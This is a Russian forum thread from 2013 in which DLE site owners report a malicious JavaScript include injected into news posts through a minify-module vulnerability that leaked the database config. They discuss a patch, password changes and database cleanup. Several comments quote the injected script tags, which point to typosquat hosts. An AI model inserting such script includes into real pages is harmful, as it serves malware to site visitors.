Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » ( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???

( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???


     26.09.2013    Все вопросы » Общие вопросы    4940

вопрос
Здравствуйте, сегодня на своих сайтах заметил вредоносный код, каким то образом в новости попал код .js
Версия dle 9.8 возможно кто то нашел дырку и размещает код, обновляйтесь на dle 10 и меняйте пароли на админа.

Вид кода такой:




Как почистить весь сайт и удалить данный скрипт ???

Ответил: vlits


ТАК ЧТО РЕБЯТА РЕШАЙТЕ ДЕЛЕМУ, ЭТО НЕ ТОЛЬКО У МЕНЯ, ЭТО МНОГО У КОГО :)
Успел предупредил, ставьте пачик по той ссылке что я написал.
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

17 комментариев

vlits
Юзер

vlits - 26 сентября 2013 17:20 -

чет код не видно было.
--script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script

Trom
Юзер

Trom - 26 сентября 2013 17:26 -

Ищи шелл и поменяй пароль к ftp, но скорее всего пас админа от сайта сбрутили.

vlits
Юзер

vlits - 26 сентября 2013 17:41 -

по теме, надо ставить пачь, __dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

информация об данной проблеме:
если не ставить пачь:


Зато может появится вот такой файлик minify_dbconfig.php.js_5cf6c499f8c1dd51050a5bf6981022a5 в папке кеша engine/cache/system/ который является копией файла настроек движка для доступа к базе данных. И злоумышленник успешно может слить всю базу себе и как бонус очистить все таблицы в ней доставив администратору ресурса массу неприятностей!!!
С появлением новых версий DLE появляются все новые и новые уязвимости которые не всегда есть возможность закрыть вовремя, но вы обязаны их искать и уведомлять своих покупателей о них.
И так, как у данной уязвимости степень опасности высокая - вы должны были прислать письмо на электронную почту, а не обвинять меня в халатности. Да, я не проверил обновлений вовремя, но я по крайней мере не предлагаю обновленную версию движка пользователям не проверив ее предварительно на уязвимости, используя которые злоумышленник может долго трепать нервы администратору сайта!!!


если в dle в админке проверять на вирусы, то находит что то такое, minify_dbconfig.php.js_5cf6c499f8c1dd51050a5bf6981022a5

так что кто то получил данные к бд и через бд в новости распихал вирус )))

ТАК ЧТО РЕБЯТА РЕШАЙТЕ ДЕЛЕМУ, ЭТО НЕ ТОЛЬКО У МЕНЯ, ЭТО МНОГО У КОГО :)
Успел предупредил, ставьте пачик по той ссылке что я написал.
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

dj-avtosh
PHP-developer

dj-avtosh - 26 сентября 2013 19:18 -

За денюшку почищу профессионально) Есть огромный опыт.

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

doktorpull
Юзер

doktorpull - 17 февраля 2014 13:33 -

Сколько возьмешь чтобы сайт вновь стал индекстироваться яндексом

dj-avtosh
PHP-developer

dj-avtosh - 17 февраля 2014 21:32 -

В icq или skype

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

vlits
Юзер

vlits - 27 сентября 2013 04:27 -

Да я и сам справлюсь. есть скрипты различные, предупредил вас ) что бы не наловили говна этого.

vlits
Юзер

vlits - 27 сентября 2013 05:36 -

пишут что данная заплатка не помогает, так что проблема актуальна !!!
решения вроде бы пока нет.

Бахмут
Юзер

Бахмут - 27 сентября 2013 07:53 -

Ничего подобного! Как только поставил заплатку - у меня сразу проблема исчезла данная.

vlits
Юзер

vlits - 27 сентября 2013 12:00 -

Если так то хорошо, просто народ пишет что проблема не решилась, по мимо заплатки нужно будет сменить пароль от базы и от админки сайта, но перед этим удалить данный вирус.

vlits
Юзер

vlits - 27 сентября 2013 14:09 -

Бахмут,
чем чистил бд от вирусов ?

FastFud
Юзер

FastFud - 27 сентября 2013 14:33 -

Делайте что написано на dle-news.ru

Потом бери базу данных и чисти ее с помощью notepad++ или другого. Восстанови базу и все.

vlits
Юзер

vlits - 27 сентября 2013 14:44 -

смешно база 40 и 80 метров ) я её не открою это раз )
а тут скрипт есть какой то: http://forum.searchengines.ru/showpost.php?p=12172854&postcount=147

FastFud
Юзер

FastFud - 27 сентября 2013 14:48 -

Ну тогда так делайте

vlits
Юзер

vlits - 27 сентября 2013 15:59 -

уже сделал, работает !

vlits
Юзер

vlits - 28 сентября 2013 13:02 -

У меня после заплатки тоже появился по новой вирусный код в БД. Потом поменял все пароли от админки(если админов несколько - то у всех), базы данных, сервера, FTP, mysql, пользователей БД. Больше скрипт не появлялся и файл minify_dbconfig.php.js по адресу engine/cache/system/ тоже перестал появляться. Так что кому не помогла заплатка - где-то профилонили и не поменяли пароли.

vlits
Юзер

vlits - 12 ноября 2013 04:54 -

На одном из моих сайтов, опять код новости заметил

<script src="http://adsense-google.ru/js/7230b2b03e2da37352abf1a659545b44.js" async="async" type="text/javascript">

</script>
<script src="http://google-statistics.ru/js/7230b2b03e2da37352abf1a659545b44.js" type="text/javascript" async="async">

</script>

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх